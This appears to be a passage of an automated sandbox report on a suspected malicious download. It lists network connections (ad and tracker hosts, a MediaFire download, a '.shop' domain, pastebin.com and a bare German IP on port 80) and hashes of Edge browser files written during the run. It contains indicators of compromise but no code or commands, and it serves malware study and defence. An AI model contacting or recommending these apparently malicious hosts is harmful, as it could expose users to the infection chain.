| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 8.8.8.8:53 | otnolatrnup.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | g.ezodn.com | udp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | bshr.ezodn.com | udp |
| US | 104.21.87.79:443 | bshr.ezodn.com | tcp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | udp |
| GB | 18.245.143.118:443 | tags.crwdcntrl.net | tcp |
| IE | 52.50.240.62:443 | bcp.crwdcntrl.net | tcp |
| IE | 54.72.120.129:443 | bcp.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | 78.73.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.142.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.87.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.240.50.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.120.72.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| FR | 35.181.89.222:443 | g.ezoic.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | id.a-mx.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | id.hadron.ad.gt | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | api.rlcdn.com | udp |
| US | 8.8.8.8:53 | id.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| NL | 79.127.227.46:443 | id.a-mx.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| US | 104.22.5.69:443 | id.hadron.ad.gt | tcp |
| DE | 3.75.62.37:443 | ups.analytics.yahoo.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| US | 34.120.133.55:443 | api.rlcdn.com | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | tcp |
| US | 172.67.38.106:443 | cdn.id5-sync.com | tcp |
| GB | 18.245.255.11:443 | cdn.prod.uidapi.com | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 104.18.35.167:443 | cdn-ima.33across.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| GB | 88.221.134.137:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| GB | 88.221.134.137:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 34.120.135.53:443 | oajs.openx.net | tcp |
| DE | 162.19.138.120:443 | lb.eu-1-id5-sync.com | tcp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | 85c486937def8a0fa343f0c760af3bcd.safeframe.googlesyndication.com | udp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | ghb.adtelligent.com | udp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | prebid.smilewanted.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | prebid.a-mo.net | udp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | udp |
| US | 23.227.151.194:443 | ghb.adtelligent.com | tcp |
| US | 104.22.31.209:443 | prebid.smilewanted.com | tcp |
| US | 104.22.31.209:443 | prebid.smilewanted.com | tcp |
| US | 104.22.31.209:443 | prebid.smilewanted.com | tcp |
| US | 104.22.31.209:443 | prebid.smilewanted.com | tcp |
| US | 104.22.31.209:443 | prebid.smilewanted.com | tcp |
| GB | 108.138.217.66:443 | hb.yellowblue.io | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| GB | 142.250.180.1:443 | 85c486937def8a0fa343f0c760af3bcd.safeframe.googlesyndication.com | tcp |
| NL | 147.75.84.158:443 | prebid.a-mo.net | tcp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| US | 34.120.135.53:443 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | 46.227.127.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.5.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.146.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.133.120.34.in-addr.arpa | udp |
| DE | 51.89.9.252:443 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | 87.70.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.38.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.255.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.62.75.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.35.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.135.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.80.122.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.151.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.31.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.217.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.84.75.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.9.89.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.151.227.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 8.8.8.8:53 | ghb1.adtelligent.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| GB | 185.239.172.170:443 | ghb1.adtelligent.com | tcp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | gem.gbc.criteo.com | udp |
| FR | 185.235.86.211:443 | ag.gbc.criteo.com | tcp |
| NL | 185.235.87.196:443 | gem.gbc.criteo.com | tcp |
| US | 8.8.8.8:53 | 8.159.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.172.239.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.87.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.86.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download2265.mediafire.com | udp |
| US | 199.91.155.6:443 | download2265.mediafire.com | tcp |
| US | 199.91.155.6:443 | download2265.mediafire.com | tcp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | sys.ctrackapp.com | udp |
| GB | 108.138.233.10:443 | sys.ctrackapp.com | tcp |
| GB | 108.138.233.10:443 | sys.ctrackapp.com | tcp |
| US | 8.8.8.8:53 | 6.155.91.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | track.donecperficiam.com | udp |
| GB | 18.165.227.107:443 | track.donecperficiam.com | tcp |
| GB | 18.165.227.107:443 | track.donecperficiam.com | tcp |
| US | 8.8.8.8:53 | go.etoro.com | udp |
| NL | 104.109.249.151:443 | go.etoro.com | tcp |
| NL | 104.109.249.151:443 | go.etoro.com | tcp |
| US | 8.8.8.8:53 | marketing.etorostatic.com | udp |
| NL | 92.122.63.182:443 | marketing.etorostatic.com | tcp |
| US | 8.8.8.8:53 | 10.233.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.227.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.249.109.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | etoro-cdn.etorostatic.com | udp |
| NL | 92.122.63.182:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 216.58.201.106:443 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 182.63.122.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | 52.177.19.104.in-addr.arpa | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| US | 8.8.8.8:53 | static.ads-twitter.com | udp |
| US | 8.8.8.8:53 | c0.adalyser.com | udp |
| US | 8.8.8.8:53 | amplify.outbrain.com | udp |
| US | 8.8.8.8:53 | cdn.taboola.com | udp |
| GB | 13.224.245.27:443 | static.hotjar.com | tcp |
| US | 151.101.193.44:443 | cdn.taboola.com | tcp |
| GB | 23.74.161.65:443 | amplify.outbrain.com | tcp |
| US | 204.79.197.237:443 | bat.bing.com | tcp |
| GB | 151.101.188.157:443 | static.ads-twitter.com | tcp |
| IE | 54.76.9.107:443 | c0.adalyser.com | tcp |
| BE | 74.125.71.155:443 | stats.g.doubleclick.net | udp |
| GB | 172.217.16.227:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | 9944765.fls.doubleclick.net | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| GB | 172.217.16.230:443 | 9944765.fls.doubleclick.net | tcp |
| US | 104.18.32.137:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | 27.245.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.161.74.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.188.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.9.76.54.in-addr.arpa | udp |
| GB | 172.217.16.230:443 | 9944765.fls.doubleclick.net | udp |
| US | 8.8.8.8:53 | trc.taboola.com | udp |
| US | 8.8.8.8:53 | tr.outbrain.com | udp |
| US | 8.8.8.8:53 | wave.outbrain.com | udp |
| US | 8.8.8.8:53 | t.co | udp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| US | 50.31.142.223:443 | tr.outbrain.com | tcp |
| US | 50.31.142.223:443 | tr.outbrain.com | tcp |
| US | 8.8.8.8:53 | analytics.twitter.com | udp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 104.244.42.67:443 | analytics.twitter.com | tcp |
| US | 8.8.8.8:53 | dc.services.visualstudio.com | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| NL | 20.50.88.242:443 | dc.services.visualstudio.com | tcp |
| US | 8.8.8.8:53 | cdn.mxpnl.com | udp |
| FR | 18.164.52.73:443 | script.hotjar.com | tcp |
| US | 130.211.5.208:443 | cdn.mxpnl.com | tcp |
| US | 8.8.8.8:53 | 223.142.31.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.88.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.52.164.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.5.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | etorologsapi.etoro.com | udp |
| IE | 20.54.24.199:443 | etorologsapi.etoro.com | tcp |
| US | 8.8.8.8:53 | 199.24.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| SG | 74.125.200.94:443 | csi.gstatic.com | tcp |
| SG | 74.125.200.94:443 | csi.gstatic.com | tcp |
| SG | 74.125.200.94:443 | csi.gstatic.com | tcp |
| US | 8.8.8.8:53 | 94.200.125.74.in-addr.arpa | udp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | ghb2.adtelligent.com | udp |
| US | 23.227.151.242:443 | ghb2.adtelligent.com | tcp |
| US | 23.227.151.194:443 | ghb2.adtelligent.com | tcp |
| US | 8.8.8.8:53 | 242.151.227.23.in-addr.arpa | udp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | udp |
| GB | 185.239.172.170:443 | ghb2.adtelligent.com | tcp |
| GB | 185.239.172.170:443 | ghb2.adtelligent.com | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 23.227.151.242:443 | ghb2.adtelligent.com | tcp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| DE | 3.123.222.124:443 | btlr.sharethrough.com | tcp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | ghb.adtelligent.com | udp |
| GB | 185.83.69.58:443 | ghb.adtelligent.com | tcp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | udp |
| GB | 185.239.172.170:443 | ghb.adtelligent.com | tcp |
| US | 8.8.8.8:53 | 124.222.123.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.69.83.185.in-addr.arpa | udp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | bargainnykwo.shop | udp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 8.8.8.8:53 | 93.47.21.104.in-addr.arpa | udp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| US | 8.8.8.8:53 | 81.47.45.147.in-addr.arpa | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 06b496d28461d5c01fc81bc2be6a9978 |
| SHA1 | 36e7a9d9c7a924d5bb448d68038c7fe5e6cbf5aa |
| SHA256 | e4a2d1395627095b0fa55e977e527ccb5b71dff3cd2d138df498f50f9f5ab507 |
| SHA512 | 6488a807c978d38d65010583c1e5582548ab8102ebd68ee827e603c9bdfcdbb9f98a488d31414a829409f6edca8bd2eb4aadd4ff31b144de41249fa63a26bc91 |
\??\pipe\LOCAL\crashpad_4332_TAJXSOPBZBPQBWXV
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | de1d175f3af722d1feb1c205f4e92d1e |
| SHA1 | 019cf8527a9b94bd0b35418bf7be8348be5a1c39 |
| SHA256 | 1b99cae942ebf99c31795fa279d51b1a2379ca0af7b27bd3c58ea6c78a033924 |
| SHA512 | f0dcd08afd3c6a761cc1afa2846ec23fb5438d6127ebd535a754498debabd0b1ebd04858d1b98be92faf14b512f982b1f3dcbb702860e96877eb835f763f9734 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 73e8cf7499c9ee0e50844e5483fe5a7a |
| SHA1 | 445dbb43dd1aca6b3bec8e5d321ea75a64d6f9af |
| SHA256 | 349c9516135c9c304e1367b888496ff317cabc3a57abf0a0d0533c99e65d8024 |
| SHA512 | 6d3f13e298526829543dc616fd502a484bad681d9c16fca9ba768c63097902a5bb728aa9fb8bc754a4b2337419842d7a7cb47989c8763e0c5b19af20326312d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | bcbd2fd9779e3b843fca25bf3e598d09 |
| SHA1 | 68961415c2cb6a941f2a95f2f2a56b1abd67f145 |
| SHA256 | 82b521392c6c004146f161724b3795db81e69387b3f55cb0ab01f64b9eeaa9ad |
| SHA512 | 64124fe5e672a392cc512a22e8491e23bbc72783a02f231618db2508f4a4e4b16fc5f833286785315d7eaad741d4801ecb0718e9b85346925ab2c7f95e29b4c2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 134a307a8f54cf12c22f3b1eac7d0808 |
| SHA1 | 9ab7d90a0648f266b9332638444bcb1c2175cebc |
| SHA256 | 3cde134b333ec57982788650ed9fae9cd353c73f94f54ad2e71761362c6de701 |
| SHA512 | f32bba608a087dfe05e882c524ae6cb0dfd122c8939e7f10bc252563e51d641cda1e466b9a2c6cf3f78888a931956785ce96da38fb05fd57d03c979a513b18ad |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 38a26229ba39eb70b629641a012a0895 |
| SHA1 | 22213bb00677b758a09304efc7a44f7d126833e7 |
| SHA256 | 6c15e11ab2bd61dbeb9c8c32f92d590ede634f8e4dc28706b2ed1c60c5f8cd7f |
| SHA512 | 78c25a22291eda92380f3c9ff91f959742dad516359b76021f487ad8d4bba8fed6c20a15b2ceef49684a971096945df2004a73cfb370b5b9ae9ddf936a34c050 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4235212a7dfd2a51f2724a0b5a11a30f |
| SHA1 | e9f443deb144a2084f9d9079480efcb9354f7d53 |
| SHA256 | 680b8e11e7b1b1c38c49007df8f55de7d24d02fd0861be389a4b85987adad10e |
| SHA512 | 1a9dfdee5e2d90681a2041b0a68a2cb2099852284123bb527c86d9e253ce401d75501fd889f59d620202f171cdcdedb76d9fa895788a4da5027c46258a977a3f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | 0fc09c9c3219c609ba2b9fed7b09d4d4 |
| SHA1 | 3302c8a63d411dbabcbab3f8d54ec0248141ba59 |
| SHA256 | a4f185a100c629a05622da5e95395924d3ae3a7a1739cf0dd2f843a80857dc31 |
| SHA512 | 67c17487a171b14bfcaff090e5c666f3ac9d241427f0b5b77ff6e1121875b1d3a9e58959a13ced94fcb981d380a9870655a4f716b09df6f8d9f58f16180c1e1c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008
| MD5 | d93800d8a77b5a8a23ec889fc76db694 |
| SHA1 | ec09b90d154d7fb428871034dfcfb695c4fe6a3f |
| SHA256 | 5afcee2da73d3c984b47833958f65caf290b12041a2b5c69a124ab4543b7f69a |
| SHA512 | 96a827ece6950bd57b5807920ed953ca60ac317816788d4582eb45d2ac2ee2d7cc9745dcf8f15017ebb2b86a23c17db12146685e80e23879230415d881bab9c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a
| MD5 | 660c3b546f2a131de50b69b91f26c636 |
| SHA1 | 70f80e7f10e1dd9180efe191ce92d28296ec9035 |
| SHA256 | fd91362b7111a0dcc85ef6bd9bc776881c7428f8631d5a32725711dce678bff9 |
| SHA512 | 6be1e881fbb4a112440883aecb232c1afc28d0f247276ef3285b17b925ea0a5d3bac8eac6db906fc6ac64a4192dd740f5743ba62ba36d8204ff3e8669b123db2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c
| MD5 | 87e8230a9ca3f0c5ccfa56f70276e2f2 |
| SHA1 | eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7 |
| SHA256 | e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9 |
| SHA512 | 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b
| MD5 | b743360743dc63200207d103eb1b95c6 |
| SHA1 | e72f603116b14184d57f9c9e0444b6c28ed53106 |
| SHA256 | 5a3421491f6de9e5d09de73458046ba886af7d223f0271d44d879f1648975a8b |
| SHA512 | 6d3d2235f13cf358fd2d3a19dc8ad7229e4e468611c804375a2b89405ff3b46ce70f3a11b18492b3b6e03745f9aa33d59514eeaa9cf5f3cc4926bb86c74f373c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fff46bcee6f699307ad87842d7a29f73 |
| SHA1 | 25a40cd26353c32b075c4f15f63362ca4075525a |
| SHA256 | b41e807640cc169ec6254c79863a45dfd82b4617ea457618f3fba38045d0c69e |
| SHA512 | 9eba032f7ed66a15f778ff39608bfbd2a41868b52619e317a5323100e10bc2ff49f30723ffd15e87bc4382e3ecc87b91d2672f5ab888386f8683bad24883a555 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023
| MD5 | 39b7e0d992290c41da06068bfbfc7c77 |
| SHA1 | f6a4d0d93047d6cadf48b2bb752f89bc9bbf6806 |
| SHA256 | 92d3d1073c33cb7ee8711bde6ac3c519b2b5f0044e5a2582aba96b14ccfef01d |
| SHA512 | c67131ea3093c9863d3c7dffc37cf54d4b17bee7abae3fda9195535bb8a736ab19115fdd14591c7fd1966014891f9b140b8763695a80207756bf01c534388a1b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5f19b1660e029b6f42580e9540492ec1 |
| SHA1 | b99e69b0c7347d3670347153abc0199d74e213ad |
| SHA256 | 2195464a126334125d2782912f74c5e5a3056f38b5a1e2210c5b8813e5b001fa |
| SHA512 | 6a61289440652ede7620256a9a9f241ce9054f4e611fff4b7caa7653fdd6e1f302d7457ce87d513b32003fb78a959dfef4f976c7e02fcf62ec9f3dcd71466740 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe586f20.TMP
| MD5 | 95a68111427ed98fcea713360fa43d83 |
| SHA1 | b4483f0f77b295adff94cd624eda0b7820434394 |
| SHA256 | 7fa05c9c97b071b2c6c54d6375d369fd8121340c1063eabb8b3a30e0978f84d1 |
| SHA512 | 8f10b50a5106bd9ecce2aeb409c3d1cf48e31b935c5c3bb76657dedf163b67b116aaaf99ccda458506d7b26d054b1aabedc450f731406994d4fd341c45900a7d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000034
| MD5 | 151fb811968eaf8efb840908b89dc9d4 |
| SHA1 | 7ec811009fd9b0e6d92d12d78b002275f2f1bee1 |
| SHA256 | 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed |
| SHA512 | 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 62e5c130b1944366607e7decb41845e2 |
| SHA1 | b087aaad8a9d74cbd6fa15189d75a832d2e4c423 |
| SHA256 | c681f082e5db0bbb40dfcfa59a86a1ef70c9f98b5fa72445611a72f9025b8b45 |
| SHA512 | 639e7d2bd7ee4529678d7ac76f6bed0a60a6378d1622597b4e4b4a79688fc2296807fea3e98f8357545092edd24acd479ca8e085c54a2109e71f928eba11e336 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f43f541132b67c45e6edc5891c5d4885 |
| SHA1 | 867e1955fe1106bb4b5027f40e60c8a86bd90317 |
| SHA256 | 958c6c4f00d832ecd22b4b8aafdc01207b86c35e655b4d9538268ed1934b88c6 |
| SHA512 | 068eaf83dfae5eb4a4a22155b542a7274d1848d44daa0c4ce31c8591bdd591607102de0a50ced2c1ea1c293ee3d1d2da111b7611f7f534a81bb00685b484c598 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 841ffb6ef42d5b4a27eb3ff69bf755ca |
| SHA1 | 6526f0fc1c6bfc284a09b15197b89dfedee951f0 |
